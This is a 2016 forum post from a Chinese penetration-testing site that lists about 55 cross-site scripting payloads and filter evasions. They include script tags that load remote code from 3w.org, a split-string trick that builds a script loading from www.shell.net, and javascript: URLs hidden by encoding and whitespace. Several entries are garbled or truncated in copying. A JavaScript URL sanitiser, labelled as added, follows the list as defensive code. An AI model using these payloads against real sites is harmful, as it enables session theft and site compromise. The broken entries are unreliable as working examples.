中国网络渗透测试联盟

Title: XSS Attack Summary

Author: admin    Time: 2016-4-28 10:06
Title: XSS Attack Summary
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups

<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag with mixed case (case-insensitive)
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes, or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escape filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
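Added defensive example, not part of the original post and not code from the forum: a JavaScript (Node) check that normalises a URL-bearing attribute value the way browsers do before they decide its scheme, so the evasions in entries (3) to (5), (9) to (14), (17) and (19) (mixed case, numeric entities with or without semicolons, embedded tab/newline/carriage return, NUL bytes, leading spaces and control characters) all collapse to the same javascript: prefix and are rejected. The function names, the blocked-scheme list and the sample inputs are assumptions of mine; the same check applies to every other URL-bearing attribute in the list (BACKGROUND, HREF, DYNSRC, LOWSRC, BGSOUND SRC, CSS url()).

```javascript
// Added defensive example, not from the original post. Normalises a URL-bearing
// attribute value the way a browser effectively does before deciding its scheme,
// then rejects script schemes. Function names and sample inputs are assumptions.

// Only the named references that matter for URL smuggling; numeric references
// (decimal and hex, with or without the trailing ';') are handled generically.
const NAMED_ENTITIES = new Map([
  ["amp", "&"], ["lt", "<"], ["gt", ">"], ["quot", '"'],
  ["apos", "'"], ["tab", "\t"], ["newline", "\n"],
]);

function decodeEntities(s) {
  // Single pass, so an '&' produced by decoding is not decoded a second time.
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (match, body) => {
    const lower = body.toLowerCase();
    let cp;
    if (lower.startsWith("#x")) cp = parseInt(lower.slice(2), 16);
    else if (lower.startsWith("#")) cp = parseInt(lower.slice(1), 10);
    else return NAMED_ENTITIES.has(lower) ? NAMED_ENTITIES.get(lower) : match;
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : "\uFFFD";
  });
}

function normaliseUrl(value) {
  let v = decodeEntities(String(value));
  // Browsers drop ASCII tab, LF and CR anywhere in a URL and ignore leading and
  // trailing C0 controls and spaces; dropping NUL collapses "java\0script" too.
  v = v.replace(/[\t\n\r\0]/g, "");
  v = v.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
  return v.toLowerCase();
}

// Schemes that execute code or smuggle markup when used in src/href/url().
const BLOCKED_SCHEMES = ["javascript:", "vbscript:", "livescript:", "data:"];

// True when the value would be treated as a script URL after normalisation.
function isScriptUrl(value) {
  const v = normaliseUrl(value);
  return BLOCKED_SCHEMES.some((scheme) => v.startsWith(scheme));
}

// Allow-list variant: relative URLs or an explicit http/https/mailto scheme pass;
// anything else (including every blocked scheme) is rejected by returning null.
function safeUrlOrNull(value) {
  if (isScriptUrl(value)) return null;
  const m = /^([a-z][a-z0-9+.-]*):/.exec(normaliseUrl(value));
  if (m && !["http", "https", "mailto"].includes(m[1])) return null;
  return value;
}

// Constructed samples mirroring the evasions in the list above (not real traffic).
const SAMPLES = [
  "javascript:alert('XSS')",                                            // (3) plain
  "JaVaScRiPt:alert('XSS')",                                            // (4) mixed case
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;1",   // (5) decimal entities
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x31",     // (10) hex, no semicolons
  "jav\tascript:1",                                                     // (11) literal tab
  "jav&#x09;ascript:1",                                                 // (12) encoded tab
  "jav&#x0A;ascript:1",                                                 // (13) newline
  "jav&#x0D;ascript:1",                                                 // (14) carriage return
  "java\0script:1",                                                     // (17) NUL byte
  " &#14;  javascript:1",                                               // (19) spaces + control char
  "https://example.com/?q=javascript:",                                 // benign: scheme is https
];

// Returns one verdict per sample, in order; the last (benign) one is false.
function classifySamples() {
  return SAMPLES.map((s) => isScriptUrl(s));
}
```

The important design choice is to decode and strip before comparing: a filter that looks for the literal string "javascript:" in the raw attribute misses every variant above, while a filter that checks the normalised prefix catches them all, and the allow-list form of the check (safeUrlOrNull) is preferable to the block-list form wherever the set of legitimate schemes is known.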

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2